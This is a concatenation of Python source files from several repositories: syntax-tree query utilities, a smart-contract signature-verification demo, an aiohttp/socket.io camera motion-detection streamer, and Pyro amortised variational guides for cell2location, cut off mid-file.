def __init__(self):
self.kind = CBUses._kind
def __str__(self):
return '$uses'
@staticmethod
def kind():
return CBUses._kind
class CBFirstArgIs:
_kind = 'Python.Mods.FirstArgIs'
def __init__(self):
self.kind = CBFirstArgIs._kind
def __str__(self):
return '$first_arg_is'
@staticmethod
def kind():
return CBFirstArgIs._kind
class CBRefTo:
_kind = 'Python.Mods.RefTo'
def __init__(self):
self.kind = CBRefTo._kind
def __str__(self):
return '$ref_to'
@staticmethod
def kind():
return CBRefTo._kind
class CBEveryChildIs:
_kind = 'Python.Mods.EveryChildIs'
def __init__(self):
self.kind = CBEveryChildIs._kind
def __str__(self):
return '$every_child'
@staticmethod
def kind():
return CBEveryChildIs._kind
class CBAnyChildIs:
_kind = 'Python.Mods.AnyChildIs'
def __init__(self):
self.kind = CBAnyChildIs._kind
def __str__(self):
return '$any_child'
@staticmethod
def kind():
return CBAnyChildIs._kind
class CBChildIs:
_kind = 'Python.Mods.ChildIs'
def __init__(self):
self.kind = CBChildIs._kind
def __str__(self):
return '$child'
@staticmethod
def kind():
return CBChildIs._kind
class CBFirstChildIs:
_kind = 'Python.Mods.FirstChildIs'
def __init__(self):
self.kind = CBFirstChildIs._kind
def __str__(self):
return '$first_child'
@staticmethod
def kind():
return CBFirstChildIs._kind
class CBModuleName:
_kind = 'Python.Mods.ModuleName'
def __init__(self):
self.kind = CBModuleName._kind
def __str__(self):
return '$module_name'
@staticmethod
def kind():
return CBModuleName._kind
class CBImportedName:
_kind = 'Python.Mods.ImportedName'
def __init__(self):
self.kind = CBImportedName._kind
def __str__(self):
return '$imported_name'
@staticmethod
def kind():
return CBImportedName._kind
class CBModuleRoot:
_kind = 'Python.Mods.ModuleRoot'
def __init__(self):
self.kind = CBModuleRoot._kind
def __str__(self):
return '$module_root'
@staticmethod
def kind():
return CBModuleRoot._kind
class CBCallTarget:
_kind = 'Python.Mods.CallTarget'
def __init__(self):
self.kind = CBCallTarget._kind
def __str__(self):
return '$call_target'
@staticmethod
def kind():
return CBCallTarget._kind
class CBFirstChildIs:
_kind = 'Python.Mods.TheFirstChild'
def __init__(self):
self.kind = CBFirstChildIs._kind
def __str__(self):
return '$the_first_child'
@staticmethod
def kind():
return CBFirstChildIs._kind
class CBSecondChildIs:
_kind = 'Python.Mods.TheSecondChild'
def __init__(self):
self.kind = CBSecondChildIs._kind
def __str__(self):
return '$the_second_child'
@staticmethod
def kind():
return CBSecondChildIs._kind
class CBThirdChildIs:
_kind = 'Python.Mods.TheThirdChild'
def __init__(self):
self.kind = CBThirdChildIs._kind
def __str__(self):
return '$the_third_child'
@staticmethod
def kind():
return CBThirdChildIs._kind
class CBNoThirdChild:
_kind = 'Python.Mods.NoThirdChild'
def __init__(self):
self.kind = CBNoThirdChild._kind
def __str__(self):
return '$no_third_child'
@staticmethod
def kind():
return CBNoThirdChild._kind
```
#### File: notebooks/utils/__init__.py
```python
from .timing import timing
from .cbjava import decode_path as decode_java_path
from .cbjava import type_to_idx as java_type_to_idx
import json
import regex
import pickle
import os.path
import xxhash
import pandas as pd
import pyarrow as pa
import pyarrow.dataset as ds
import pyarrow.parquet as pq
import pyarrow.gandiva as gd
__F_CACHE = {}
__DATA = None
__T_CACHE = {}
QUERY_LANG = r"^((\{(>|<)?=?\d*\})(\^)?(\".*?\"=)?\(?([a-z_0-9]+)?\)?(\.f_[a-z_0-9]+)?(\[\d+\])?)+$"
SUB_QUERY_LANG = r"(\{(>|<)?=?\d*\})(\^)?(\".*?\"=)?\(?([a-z_0-9]+)?\)?(\.f_[a-z_0-9]+)?(\[\d+\])?"
QUERY_REGEX = regex.compile(QUERY_LANG)
SUB_QUERY_REGEX = regex.compile(SUB_QUERY_LANG)
def get_text_fragement(fid, start, end, debug=False):
if debug:
return 'get_file({}@{}:{})'.format(fid, start, end)
try:
if fid not in __F_CACHE:
with open('/data/raw-files/{}.txt'.format(fid), 'rb') as fh:
__F_CACHE[fid] = fh.read()
return __F_CACHE[fid].decode('utf-8')[start:end]
except Exception as ex:
return str(ex) + '\ncant find {}@{}:{}'.format(fid, start, end)
def decode_op_dist(dist):
if dist is None or len(dist.replace('{', '').replace('}', '')) <= 0:
return 0, int(0)
dist = dist[1:-1]
if dist[0] == '=':
return 5, int(dist[1:])
elif dist[:2] == '<=':
return 2, int(dist[2:])
elif dist[:2] == '>=':
return 4, int(dist[2:])
elif dist[0] == '<':
return 1, int(dist[1:])
elif dist[0] == '>':
return 3, int(dist[1:])
else:
return 0, int(dist)
def parse_query(query_string, type_to_idx, debug=False):
builder = gd.TreeExprBuilder()
if query_string[0] != '{':
query_string = '{}' + query_string
match = regex.match(QUERY_REGEX, query_string, version=regex.V1)
target_func = 'match_tree_path_{}_'.format(len(match.captures(1)))
params = []
first_label = '?'
for i, sub_string in enumerate(match.captures(1)):
sub_match = regex.match(SUB_QUERY_REGEX, sub_string, version=regex.V1)
steps, _, negate, name, label, field, index = sub_match.groups()
if first_label == '?':
first_label = label
negate = negate == '^'
match_name = name is not None
name = name[1:-2] if match_name else None
match_label = label is not None
label = type_to_idx(label) if match_label else 0
match_field = field is not None
field = type_to_idx(field[1:]) if match_field else 0
match_index = index is not None
index = int(index[1:-1]) if match_index else 0
steps_op, steps_dist = decode_op_dist(steps)
target_func += ('1' if negate else '0')
target_func += ('1' if match_label else '0')
target_func += ('1' if match_name else '0')
target_func += ('1' if match_field else '0')
target_func += ('1' if match_index else '0')
if match_label:
params.append(builder.make_literal(label, pa.uint16()))
if match_name:
as_hash = int.from_bytes(
xxhash.xxh64(name, seed=3235823838).intdigest().to_bytes(8, byteorder='little'),
signed=True, byteorder="little"
)
params.append(builder.make_literal(as_hash, pa.int64()))
if match_field:
params.append(builder.make_literal(field, pa.uint16()))
if match_index:
params.append(builder.make_literal(index, pa.uint16()))
if steps_op == 5:
target_func += '3'
params.append(builder.make_literal(steps_dist, pa.uint16()))
elif steps_op == 4:
target_func += '2'
params.append(builder.make_literal(steps_dist - 1, pa.uint16()))
elif steps_op == 3:
target_func += '2'
params.append(builder.make_literal(steps_dist, pa.uint16()))
elif steps_op == 2:
target_func += '1'
params.append(builder.make_literal(steps_dist + 1, pa.uint16()))
elif steps_op == 1:
target_func += '1'
params.append(builder.make_literal(steps_dist, pa.uint16()))
else:
target_func += '0'
target_func += '_'
target_func = target_func[:-1]
if debug:
print(first_label, target_func, params)
return first_label, target_func, params, builder
def get_text_from_capture(res, cidx):
offset = 32 + (cidx - 1) * 40
return get_text_fragement(
int.from_bytes(res[0:8], signed=True, byteorder="little"),
int.from_bytes(res[offset+0:offset+4], signed=False, byteorder="little"),
int.from_bytes(res[offset+4:offset+8], signed=False, byteorder="little")
)
def get_texts_from_capture(res, cidx):
offset = 32 + (cidx - 1) * 40
out = []
for r in res:
out.append(get_text_fragement(
int.from_bytes(r[0:8], signed=True, byteorder="little"),
int.from_bytes(r[offset+0:offset+4], signed=False, byteorder="little"),
int.from_bytes(r[offset+4:offset+8], signed=False, byteorder="little")
))
return out
def query_java(query_string, extra="file_id", name_is=None, name_regex=None):
global __DATA, __T_CACHE
root_type, target_func, params, builder = parse_query(query_string, java_type_to_idx)
as_table = None
proj = None
if __DATA is None:
__DATA = ds.dataset('/data/parquet', format='parquet', partitioning='hive')
if root_type not in __T_CACHE:
the_filter = ds.field('type') == root_type
extra_cols = [extra]
if name_is is not None:
extra_cols.append('name')
the_filter = the_filter & (ds.field('name') == name_is)
elif name_regex is not None:
print('Regex name filter not yet supported')
__T_CACHE[root_type] = __DATA.to_table(
columns=['path'] + extra_cols,
filter=the_filter
)
as_table = __T_CACHE[root_type]
params = [
builder.make_field(as_table.schema.field(extra)),
builder.make_field(as_table.schema.field('path'))
] + params
proj = gd.make_projector(as_table.schema, [
builder.make_expression(
builder.make_function(target_func, params, pa.binary()),
pa.field("result", pa.binary())
)
], pa.default_memory_pool())
total = []
for record_batch in as_table.to_batches():
res, = proj.evaluate(record_batch)
temp = res.to_pandas()
total.append(temp[temp != b''])
final = pd.concat(total)
return final
def merge_paths(series_l, series_r, on):
on_l, on_r = on
frame_l = series_l
if not isinstance(series_l, pd.DataFrame):
frame_l = series_l.to_frame(name="dat")
frame_r = series_r
if not isinstance(series_r, pd.DataFrame):
frame_r = series_r.to_frame(name="dat")
target_l = None
if on_l.startswith('left.'):
target_l = frame_l.dat_l
on_l = on_l.replace('left.', '')
elif on_l.startswith('right.'):
target_l = frame_l.dat_r
on_l = on_l.replace('right.', '')
else:
target_l = frame_l.dat
target_r = None
if on_r.startswith('left.'):
target_r = frame_r.dat_l
on_r = on_r.replace('left.', '')
elif on_r.startswith('right.'):
target_r = frame_r.dat_r
on_r = on_r.replace('right.', '')
else:
target_r = frame_r.dat
if on_l.startswith('defs.'):
cindex = int(on_l.replace('defs.', '')) - 1
frame_l['key'] = target_l.str[16+40*cindex:24+40*cindex]
elif on_l.startswith('gids.'):
cindex = int(on_l.replace('gids.', '')) - 1
frame_l['key'] = target_l.str[8+40*cindex:16+40*cindex]
if on_r.startswith('defs.'):
cindex = int(on_r.replace('defs.', '')) - 1
frame_r['key'] = target_r.str[16+40*cindex:24+40*cindex]
elif on_r.startswith('gids.'):
cindex = int(on_r.replace('gids.', '')) - 1
frame_r['key'] = target_r.str[8+40*cindex:16+40*cindex]
frame_l.columns = frame_l.columns.map(lambda x: str(x) + '_l')
frame_r.columns = frame_r.columns.map(lambda x: str(x) + '_r')
return frame_l.merge(
frame_r,
how="inner",
left_on="key_l",
right_on="key_r"
)
def get_results(result_set, labels):
def _get_all_labels(cur):
if isinstance(cur, list):
res = []
for i, l in enumerate(cur):
if l is not None:
res.append(('dat', i + 1, l))
return res
return list(map(
lambda x: (x[0] + '_l', x[1], x[2]),
_get_all_labels(cur['left'])
)) + list(map(
lambda x: (x[0] + '_r', x[1], x[2]),
_get_all_labels(cur['right'])
))
results_map = {}
for path, idx, label in _get_all_labels(labels):
if path == 'dat':
results_map[label] = get_texts_from_capture(result_set, idx)
else:
results_map[label] = get_texts_from_capture(result_set[path], idx)
return results_map
```
#### File: notebooks/utils/timing.py
```python
import contextlib
import time
@contextlib.contextmanager
def timing(description: str) -> None:
start = time.perf_counter()
yield
ellapsed_time = time.perf_counter() - start
print(f"{description}: {ellapsed_time:.4f}s")
``` |
{
"source": "jjhesk/TrustVault",
"score": 2
} |
#### File: TrustVault/codec/BaseVault.py
```python
from moody.contracttool import ContractTool
from codec.gen_py.enrockvault import Enrockvault
from codec.gen_py.tc20 import Tc20
from codec.gen_py.test_enclose import TestEnclose
from codec.gen_py.vault_config_provider import VaultConfigProvider
from codec.gen_py.verify_signature import VerifySignature
from key import NETWORK
class TokenBase(ContractTool):
def defineToken(self, name: str) -> "TokenBase":
if not self.hasContractName(name):
print(f"Token {name} is not found..")
exit(0)
self.token: Tc20 = Tc20(self, self.getAddr(name))
self.token.CallAutoConf(self).CallDebug(True).CallContractWait(self.waitSec)
return self
def defineTVault(self) -> "TokenBase":
self.tenclose: TestEnclose = TestEnclose(self, self.getAddr("TestEnclose"))
self.tenclose.CallAutoConf(self).CallDebug(True).CallContractWait(self.waitSec)
return self
def defineVault(self) -> "TokenBase":
self.envault: Enrockvault = Enrockvault(self, self.getAddr("Enrockvault"))
self.envault.CallAutoConf(self).CallDebug(True).CallContractWait(self.waitSec)
return self
def defineVaultConfigProvider(self) -> "TokenBase":
self.vault_config_provider: VaultConfigProvider = VaultConfigProvider(self, self.getAddr("VaultConfigProvider"))
self.vault_config_provider.CallAutoConf(self).CallDebug(True).CallContractWait(self.waitSec)
return self
def defineSignatureProvider(self) -> "TokenBase":
self.versign: VerifySignature = VerifySignature(self, self.getAddr("VerifySignature"))
self.versign.CallAutoConf(self).CallDebug(True).CallContractWait(self.waitSec)
return self
class BsVault(TokenBase):
def __init__(self, path_bs: str):
# super().__init__(NETWORK, path_bs, OKTEST_DEPLOY, WALLETS)
super().__init__(NETWORK, path_bs, {}, [])
self.withPOA()
self.setWorkspace(path_bs).Auth("")
self.connect(path_bs, False)
self.OverrideGasConfig(6000000, 1059100000)
self.OverrideChainConfig(10 ** 18, 6)
def By(self, player: int) -> "BsVault":
# switch account to the index A account
self.AuthIndex(player)
return self
```
#### File: jjhesk/TrustVault/demo_verify.py
```python
from moody import Bolors
from key import ROOT
from codec.BaseVault import BsVault
def Prod() -> BsVault:
# ========================== Of course
j = BsVault(ROOT)
return j
"""
from the request
Address string `json:"wallet_address"`
Signed string `json:"signed_message"`
Hash string `json:"hash_message"`
Original string `json:"original_message"`
"""
hash_message = ""
signed_message = ""
res = Prod().versign.recover_signer(
eth_signed_message_hash=hash_message,
signature=signed_message
)
# the message is now success or not
result = "success" if res is True else "failed"
print(f"The verification is {result}")
``` |
{
"source": "jjhickman/panoptix",
"score": 3
} |
#### File: panoptix/camera/camera.py
```python
import time
import argparse
import socket
import asyncio
from aiohttp.payload_streamer import StreamWrapperPayload
import socketio
import cv2
import base64
import logging
import multiprocessing
from detector import Detector
import requests
import aiohttp
from aiohttp import web
stream_url = ''
sio = socketio.AsyncServer()
logger = None
static_back = None
detector = []
frame_queue = multiprocessing.Queue(1)
"""
=============================================================================
REST API routes
=============================================================================
"""
# GET request handler for stream
async def index(request):
global logger
index_html = """<html>
<head><title>""" + socket.gethostname() + """</title></head>
<body>
<h1>""" + socket.gethostname() + """</h1>
<img id='image' src=''/>
<script src="https://cdn.socket.io/3.1.1/socket.io.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script>
const socket = io.connect('""" + stream_url + """');
console.log("Connection started")
socket.on('image', (image) => {
console.log("New image!");
let imageStr = new TextDecoder("utf-8").decode(image);
document.getElementById('image').src = 'data:image/jpeg;base64,' + imageStr;
});
</script>
</body>
</html>"""
logger.debug('Request for stream: {}\n\nSending: {}'.format(request, index_html))
return web.Response(text=index_html, content_type='text/html')
def detect(config, q, url, logger):
detector = Detector(bg_history=10,
bg_skip_frames=1,
movement_frames_history=2,
brightness_discard_level=5,
bg_subs_scale_percent=0.2,
pixel_compression_ratio=0.1,
group_boxes=True,
expansion_step=5)
awake_time = time.time()
while True:
frame = q.get()
if frame is None:
continue
boxes, f = detector.detect(frame)
if len(boxes) > 0 and time.time() >= awake_time:
response = requests.post(url, data={'source': stream_url, 'time': round(time.time() * 1000)}, timeout=500)
if response.status_code == 200:
logger.debug('Successfully notified hub!')
else:
logger.debug(response.text)
"""
=============================================================================
SocketIO camera capture async loop for web stream and for GPIO input
=============================================================================
"""
async def stream(app, q):
global logger, stream_url, frame_queue
refresh_seconds = 1.0 / 20
logger.debug('Updating stream every {} seconds'.format(refresh_seconds))
try:
while True:
ret, frame = app['capture'].read()
frame_queue.put(frame)
if ret == False:
logger.error("FAILED READING FROM CAPTURE")
break
ret, jpg_image = cv2.imencode('.jpg', frame)
base64_image = base64.b64encode(jpg_image)
await app['socket'].emit('image', base64_image)
await asyncio.sleep(refresh_seconds)
logger.debug('Ended stream!')
except asyncio.CancelledError:
logger.debug('Stream cancelled')
"""
=============================================================================
SocketIO handles
=============================================================================
"""
@sio.on('finished')
async def handle_finish(sid, data):
logger.info('Client {} finished job. Disconnecting...'.format(sid))
await sio.disconnect(sid)
@sio.event
async def connect(sid, environ):
logger.info('CONNECTED to client with id: {}'.format(sid))
@sio.event
def disconnect(sid):
logger.info('DISCONNECTED from client with id: {}'.format(sid))
"""
=============================================================================
Setup and configuration for GPIO, socketio, and web server/API
=============================================================================
"""
def initialize():
global sio, stream_url, logger
parser = argparse.ArgumentParser()
parser.add_argument('--endpoint', '-e', type=str, default='192.168.50.200')
parser.add_argument('--username', '-u', type=str, default='username')
parser.add_argument('--password', '-p', type=str, default='password')
parser.add_argument('--cooldown', '-c', type=int, default=15)
parser.add_argument('--threshold', '-t', type=float, default=0.1)
args = parser.parse_args()
log_formatter = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s")
logger = logging.getLogger('aiohttp.server')
logger.setLevel(logging.DEBUG)
console_handler = logging.StreamHandler()
console_handler.setFormatter(log_formatter)
logger.addHandler(console_handler)
app = web.Application()
app['config'] = args
print(socket.gethostbyname(socket.gethostname()))
stream_url = 'http://{}:{}'.format(socket.gethostbyname(socket.gethostname()), 8888)
print('Streaming from {}'.format(stream_url))
sio.attach(app)
app['socket'] = sio
app.router.add_get('/', index)
app.on_startup.append(start_tasks)
app.on_cleanup.append(cleanup_tasks)
return app, socket.gethostbyname(socket.gethostname())
#return app, app['config'].address
async def start_tasks(app):
app['capture'] = cv2.VideoCapture(0)
app['stream'] = app.loop.create_task(stream(app, frame_queue))
async def cleanup_tasks(app):
app['capture'].release()
cv2.destroyAllWindows()
if __name__ == '__main__':
app, address = initialize()
worker = multiprocessing.Process(target=detect, args=(app['config'], frame_queue, stream_url, logger))
worker.start()
web.run_app(app, host=socket.gethostbyname(socket.gethostname()), port=8888)
``` |
{
"source": "jjhong922/cell2location",
"score": 2
} |
#### File: cell2location/distributions/AutoNormalEncoder.py
```python
from contextlib import ExitStack # python 3
from copy import deepcopy
import numpy as np
import pyro
import pyro.distributions as dist
import torch
from pyro.distributions.transforms import SoftplusTransform
from pyro.distributions.util import sum_rightmost
from pyro.infer.autoguide import AutoGuide
from pyro.infer.autoguide import AutoGuideList as PyroAutoGuideList
from pyro.infer.autoguide.guides import deep_getattr, deep_setattr
from pyro.infer.autoguide.utils import helpful_support_errors
from pyro.nn import PyroModule, PyroParam
from pyro.nn.module import to_pyro_module_
from scvi._compat import Literal
from scvi.nn import FCLayers
from torch.distributions import biject_to
class FCLayersPyro(FCLayers, PyroModule):
pass
class AutoGuideList(PyroAutoGuideList):
def quantiles(self, quantiles, *args, **kwargs):
"""
Returns the posterior quantile values of each latent variable.
Parameters
----------
quantiles
A list of requested quantiles between 0 and 1.
Returns
-------
A dict mapping sample site name to quantiles tensor.
"""
result = {}
for part in self:
result.update(part.quantiles(quantiles, *args, **kwargs))
return result
class AutoNormalEncoder(AutoGuide):
"""
AutoNormal posterior approximation for amortised inference,
where mean and sd of the posterior distributions are approximated using a neural network:
mean, sd = encoderNN(input data).
The class supports single encoder for all parameters as well as one encoder per parameter.
The output of encoder network is treated as a hidden layer, mean and sd are a linear function of hidden layer nodes,
sd is transformed to positive scale using softplus. Data is log-transformed on input.
This class requires `amortised_plate_sites` dictionary with details about amortised variables (see below).
Guide will have the same call signature as the model, so any argument to the model can be used for encoding as
annotated in `amortised_plate_sites`, but it does not have to be the same as observed data in the model.
"""
def __init__(
self,
model,
amortised_plate_sites: dict,
n_in: int,
n_hidden: dict = None,
init_param=0,
init_param_scale: float = 1 / 50,
scales_offset: float = -2,
encoder_class=FCLayersPyro,
encoder_kwargs=None,
multi_encoder_kwargs=None,
encoder_instance: torch.nn.Module = None,
create_plates=None,
encoder_mode: Literal["single", "multiple", "single-multiple"] = "single",
):
"""
Parameters
----------
model
Pyro model
amortised_plate_sites
Dictionary with amortised plate details:
the name of observation/minibatch plate,
indexes of model args to provide to encoder,
variable names that belong to the observation plate
and the number of dimensions in non-plate axis of each variable - such as:
{
"name": "obs_plate",
"input": [0], # expression data + (optional) batch index ([0, 2])
"input_transform": [torch.log1p], # how to transform input data before passing to NN
"sites": {
"n_s_cells_per_location": 1,
"y_s_groups_per_location": 1,
"z_sr_groups_factors": self.n_groups,
"w_sf": self.n_factors,
"l_s_add": 1,
}
}
n_in
Number of input dimensions (for encoder_class).
n_hidden
Number of hidden nodes in each layer, one of 3 options:
1. Integer denoting the number of hidden nodes
2. Dictionary with {"single": 200, "multiple": 200} denoting the number of hidden nodes for each `encoder_mode` (See below)
3. Allowing different number of hidden nodes for each model site. Dictionary with the number of hidden nodes for single encode mode and each model site:
{
"single": 200
"n_s_cells_per_location": 5,
"y_s_groups_per_location": 5,
"z_sr_groups_factors": 128,
"w_sf": 128,
"l_s_add": 5,
}
init_param
Not implemented yet - initial values for amortised variables.
init_param_scale
How to scale/normalise initial values for weights converting hidden layers to mean and sd.
encoder_class
Class for defining encoder network.
encoder_kwargs
Keyword arguments for encoder_class.
multi_encoder_kwargs
Optional separate keyword arguments for encoder_class, useful when encoder_mode == "single-multiple".
encoder_instance
Encoder network instance, overrides class input and the input instance is copied with deepcopy.
create_plates
Function for creating plates
encoder_mode
Use single encoder for all variables ("single"), one encoder per variable ("multiple")
or a single encoder in the first step and multiple encoders in the second step ("single-multiple").
"""
super().__init__(model, create_plates=create_plates)
self.amortised_plate_sites = amortised_plate_sites
self.encoder_mode = encoder_mode
self.scales_offset = scales_offset
self.softplus = SoftplusTransform()
if n_hidden is None:
n_hidden = {"single": 200, "multiple": 200}
else:
if isinstance(n_hidden, int):
n_hidden = {"single": n_hidden, "multiple": n_hidden}
elif not isinstance(n_hidden, dict):
raise ValueError("n_hidden must be either in or dict")
encoder_kwargs = deepcopy(encoder_kwargs) if isinstance(encoder_kwargs, dict) else dict()
encoder_kwargs["n_hidden"] = n_hidden["single"]
self.encoder_kwargs = encoder_kwargs
if multi_encoder_kwargs is None:
multi_encoder_kwargs = deepcopy(encoder_kwargs)
self.multi_encoder_kwargs = multi_encoder_kwargs
if "multiple" in n_hidden.keys():
self.multi_encoder_kwargs["n_hidden"] = n_hidden["multiple"]
self.single_n_in = n_in
self.multiple_n_in = n_in
self.n_out = (
np.sum([np.sum(amortised_plate_sites["sites"][k]) for k in amortised_plate_sites["sites"].keys()]) * 2
)
self.n_hidden = n_hidden
self.encoder_class = encoder_class
self.encoder_instance = encoder_instance
if "single" in self.encoder_mode:
# create a single encoder NN
if encoder_instance is not None:
self.one_encoder = deepcopy(encoder_instance)
# convert to pyro module
to_pyro_module_(self.one_encoder)
else:
self.one_encoder = encoder_class(
n_in=self.single_n_in, n_out=self.n_hidden["single"], **self.encoder_kwargs
)
if "multiple" in self.encoder_mode:
self.multiple_n_in = self.n_hidden["single"]
self.init_param_scale = init_param_scale
def _setup_prototype(self, *args, **kwargs):
super()._setup_prototype(*args, **kwargs)
self._event_dims = {}
self._cond_indep_stacks = {}
self.hidden2locs = PyroModule()
self.hidden2scales = PyroModule()
if "multiple" in self.encoder_mode:
# create module for collecting multiple encoder NN
self.multiple_encoders = PyroModule()
# Initialize guide params
for name, site in self.prototype_trace.iter_stochastic_nodes():
# Collect unconstrained event_dims, which may differ from constrained event_dims.
with helpful_support_errors(site):
init_loc = biject_to(site["fn"].support).inv(site["value"].detach()).detach()
event_dim = site["fn"].event_dim + init_loc.dim() - site["value"].dim()
self._event_dims[name] = event_dim
# Collect independence contexts.
self._cond_indep_stacks[name] = site["cond_indep_stack"]
# determine the number of hidden layers
if "multiple" in self.encoder_mode:
if "multiple" in self.n_hidden.keys():
n_hidden = self.n_hidden["multiple"]
else:
n_hidden = self.n_hidden[name]
elif "single" in self.encoder_mode:
n_hidden = self.n_hidden["single"]
# add linear layer for locs and scales
param_dim = (n_hidden, self.amortised_plate_sites["sites"][name])
init_param = np.random.normal(
np.zeros(param_dim),
(np.ones(param_dim) * self.init_param_scale) / np.sqrt(n_hidden),
).astype("float32")
deep_setattr(
self.hidden2locs,
name,
PyroParam(torch.tensor(init_param, device=site["value"].device, requires_grad=True)),
)
init_param = np.random.normal(
np.zeros(param_dim),
(np.ones(param_dim) * self.init_param_scale) / np.sqrt(n_hidden),
).astype("float32")
deep_setattr(
self.hidden2scales,
name,
PyroParam(torch.tensor(init_param, device=site["value"].device, requires_grad=True)),
)
if "multiple" in self.encoder_mode:
# create multiple encoders
if self.encoder_instance is not None:
# copy instances
encoder_ = deepcopy(self.encoder_instance).to(site["value"].device)
# convert to pyro module
to_pyro_module_(encoder_)
deep_setattr(
self.multiple_encoders,
name,
encoder_,
)
else:
# create instances
deep_setattr(
self.multiple_encoders,
name,
self.encoder_class(n_in=self.multiple_n_in, n_out=n_hidden, **self.multi_encoder_kwargs).to(
site["value"].device
),
)
def _get_loc_and_scale(self, name, encoded_hidden):
"""
Get mean (loc) and sd (scale) of the posterior distribution, as a linear function of encoder hidden layer.
Parameters
----------
name
variable name
encoded_hidden
tensor when `encoder_mode == "single"`
and dictionary of tensors for each site when `encoder_mode == "multiple"`
"""
linear_locs = deep_getattr(self.hidden2locs, name)
linear_scales = deep_getattr(self.hidden2scales, name)
if "multiple" in self.encoder_mode:
# when using multiple encoders extract hidden layer for this parameter
encoded_hidden = encoded_hidden[name]
locs = encoded_hidden @ linear_locs
scales = self.softplus((encoded_hidden @ linear_scales) - self.scales_offset)
return locs, scales
def encode(self, *args, **kwargs):
"""
Apply encoder network to input data to obtain hidden layer encoding.
Parameters
----------
args
Pyro model args
kwargs
Pyro model kwargs
"""
in_names = self.amortised_plate_sites["input"]
x_in = [kwargs[i] if i in kwargs.keys() else args[i] for i in in_names]
# apply data transform before passing to NN
in_transforms = self.amortised_plate_sites["input_transform"]
x_in = [in_transforms[i](x) for i, x in enumerate(x_in)]
if "single" in self.encoder_mode:
# encode with a single encoder
res = self.one_encoder(*x_in)
if "multiple" in self.encoder_mode:
# when there is a second layer of multiple encoders fetch encoders and encode data
x_in[0] = res
res = {
name: deep_getattr(self.multiple_encoders, name)(*x_in)
for name, site in self.prototype_trace.iter_stochastic_nodes()
}
else:
# when there are multiple encoders fetch encoders and encode data
res = {
name: deep_getattr(self.multiple_encoders, name)(*x_in)
for name, site in self.prototype_trace.iter_stochastic_nodes()
}
return res
def forward(self, *args, **kwargs):
"""
An automatic guide with the same ``*args, **kwargs`` as the base ``model``.
.. note:: This method is used internally by :class:`~torch.nn.Module`.
Users should instead use :meth:`~torch.nn.Module.__call__`.
:return: A dict mapping sample site name to sampled value.
:rtype: dict
"""
# if we've never run the model before, do so now so we can inspect the model structure
if self.prototype_trace is None:
self._setup_prototype(*args, **kwargs)
encoded_hidden = self.encode(*args, **kwargs)
plates = self._create_plates(*args, **kwargs)
result = {}
for name, site in self.prototype_trace.iter_stochastic_nodes():
transform = biject_to(site["fn"].support)
with ExitStack() as stack:
for frame in site["cond_indep_stack"]:
if frame.vectorized:
stack.enter_context(plates[frame.name])
site_loc, site_scale = self._get_loc_and_scale(name, encoded_hidden)
unconstrained_latent = pyro.sample(
name + "_unconstrained",
dist.Normal(
site_loc,
site_scale,
).to_event(self._event_dims[name]),
infer={"is_auxiliary": True},
)
value = transform(unconstrained_latent)
if pyro.poutine.get_mask() is False:
log_density = 0.0
else:
log_density = transform.inv.log_abs_det_jacobian(
value,
unconstrained_latent,
)
log_density = sum_rightmost(
log_density,
log_density.dim() - value.dim() + site["fn"].event_dim,
)
delta_dist = dist.Delta(
value,
log_density=log_density,
event_dim=site["fn"].event_dim,
)
result[name] = pyro.sample(name, delta_dist)
return result
@torch.no_grad()
def median(self, *args, **kwargs):
"""
Returns the posterior median value of each latent variable.
:return: A dict mapping sample site name to median tensor.
:rtype: dict
"""
encoded_latent = self.encode(*args, **kwargs)
medians = {}
for name, site in self.prototype_trace.iter_stochastic_nodes():
site_loc, _ = self._get_loc_and_scale(name, encoded_latent)
median = biject_to(site["fn"].support)(site_loc)
if median is site_loc:
median = median.clone()
medians[name] = median
return medians
@torch.no_grad()
def quantiles(self, quantiles, *args, **kwargs):
"""
Returns posterior quantiles each latent variable. Example::
print(guide.quantiles([0.05, 0.5, 0.95]))
:param quantiles: A list of requested quantiles between 0 and 1.
:type quantiles: torch.Tensor or list
:return: A dict mapping sample site name to a list of quantile values.
:rtype: dict
"""
encoded_latent = self.encode(*args, **kwargs)
results = {}
for name, site in self.prototype_trace.iter_stochastic_nodes():
site_loc, site_scale = self._get_loc_and_scale(name, encoded_latent)
site_quantiles = torch.tensor(quantiles, dtype=site_loc.dtype, device=site_loc.device)
site_quantiles_values = dist.Normal(site_loc, site_scale).icdf(site_quantiles)
constrained_site_quantiles = biject_to(site["fn"].support)(site_quantiles_values)
results[name] = constrained_site_quantiles
return results
```
#### File: models/base/_pyro_mixin.py
```python
from datetime import date
from functools import partial
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import pyro
import torch
from pyro import poutine
from pyro.infer.autoguide import AutoNormal, init_to_mean
from scipy.sparse import issparse
from scvi import _CONSTANTS
from scvi.data._anndata import get_from_registry
from scvi.dataloaders import AnnDataLoader
from scvi.model._utils import parse_use_gpu_arg
from ...distributions.AutoNormalEncoder import AutoGuideList, AutoNormalEncoder
def init_to_value(site=None, values={}):
if site is None:
return partial(init_to_value, values=values)
if site["name"] in values:
return values[site["name"]]
else:
return init_to_mean(site)
class AutoGuideMixinModule:
"""
This mixin class provides methods for:
- initialising standard AutoNormal guides
- initialising amortised guides (AutoNormalEncoder)
- initialising amortised guides with special additional inputs
"""
def _create_autoguide(
self,
model,
amortised,
encoder_kwargs,
data_transform,
encoder_mode,
init_loc_fn=init_to_mean,
n_cat_list: list = [],
encoder_instance=None,
):
if not amortised:
_guide = AutoNormal(
model,
init_loc_fn=init_loc_fn,
create_plates=model.create_plates,
)
else:
encoder_kwargs = encoder_kwargs if isinstance(encoder_kwargs, dict) else dict()
n_hidden = encoder_kwargs["n_hidden"] if "n_hidden" in encoder_kwargs.keys() else 200
init_param_scale = (
encoder_kwargs["init_param_scale"] if "init_param_scale" in encoder_kwargs.keys() else 1 / 50
)
if "init_param_scale" in encoder_kwargs.keys():
del encoder_kwargs["init_param_scale"]
amortised_vars = self.list_obs_plate_vars
_guide = AutoGuideList(model, create_plates=model.create_plates)
_guide.append(
AutoNormal(
pyro.poutine.block(model, hide=list(amortised_vars["sites"].keys())),
init_loc_fn=init_loc_fn,
)
)
if isinstance(data_transform, np.ndarray):
# add extra info about gene clusters to the network
self.register_buffer("gene_clusters", torch.tensor(data_transform.astype("float32")))
n_in = model.n_vars + data_transform.shape[1]
data_transform = self.data_transform_clusters()
elif data_transform == "log1p":
# use simple log1p transform
data_transform = torch.log1p
n_in = self.model.n_vars
elif (
